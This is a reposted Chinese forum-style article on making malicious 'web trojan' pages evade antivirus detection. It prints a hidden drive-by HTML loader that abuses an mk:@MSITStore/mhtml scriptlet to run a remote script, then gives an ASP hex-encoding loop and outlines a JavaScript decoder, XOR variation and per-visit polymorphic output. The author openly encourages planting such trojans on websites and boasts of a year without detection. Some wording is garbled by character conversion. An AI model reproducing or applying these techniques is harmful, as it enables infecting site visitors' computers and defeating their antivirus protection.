当前位置:七道奇文章资讯安全技术网络技术
日期:2010-04-16 01:25:00  来源:本站整理

网马免杀----初级摸索[网络技术]

赞助商链接



  本文“网马免杀----初级摸索[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

<HTML oncontextmenu="returnfalse">
<HEAD>
<TITLE> </TITLE>
</HEAD>
<BODY>
<SCRIPTLANGUAGE="JavaScript.Encode"src="1.js">
</SCRIPT>
<SCRIPTLANGUAGE="JavaScript">
varurl=document.location.href;url=url.substring(0,url.lastIndexOf('/'));
document.write('<OBJECTWidth=0Height=0style="display:none;"
type="text/x-scriptlet"data="mk:@MSITStore:mhtml:c:\\.mht!'+url+'/1.js::/%23">
</OBJECT>');
window.status=" ";
</SCRIPT>
</BODY>
<NOSCRIPT><iframestyle="display:none;">
</HTML>

先拿一段从前对比老的网马做阐明.
很多人喜好用:escape()和unescape()来加密和解密网马.
不过终究还是被杀软杀掉.用的人太多了,不杀才怪.
也有人用Script Encoder来加密.这个当然也好办理.

我个人认为,很多情形下要的是思维.
为什么自己不写一个自定义加密算法.那么你出的网马就是唯一性的.
杀软想杀也没有办法.被杀改一下种子他又杀不了了.

我最开始用这种思绪编写网马的时刻,挂了一年的马,历来没有被杀过.
所以本日就提出这种思维吧.
办法也很简单.
原理普通是这样.
脚本或利用程序写诞生成器.
比方:上面的代码 我们付值给S这个变量.
s="上面的代码"
目前用ASP.写个简单的自定义加密.
<%
s=wmhtmlcode
for i=1 to len(s)
        newstr=newstr & Hex(asc(mid(s,i,1)))

next
%>
目前把加密后的代码给了newstr这个变量.
我们再用JS代码举行解密并输出.
JS代码大家就自己写了.
<script>
document.write jm(<%=newstr%>);
</script>
这样就实际了加密和解密.
查看网马源代码的时刻.就不会有什么特点码.
假如被杀,稍改正一下加密算法就通过.
大概你XOR一下,值又改变了.
假如做成ASP,PHP脚本网马.
便可以实现每一次拜候网马,后果源代码内容都不相同.
本人很倡议挂马,挂脚本文件,很好掌握网马的输出状况.
发现被杀,即刻在脚本文件的第一行,终止输出.
这样站也不会掉得太快.改好了再松开,开关.
思维是很重要的.

                .....Fanney!


  以上是“网马免杀----初级摸索[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
  • 网马免杀----初级摸索
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        0%(0)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .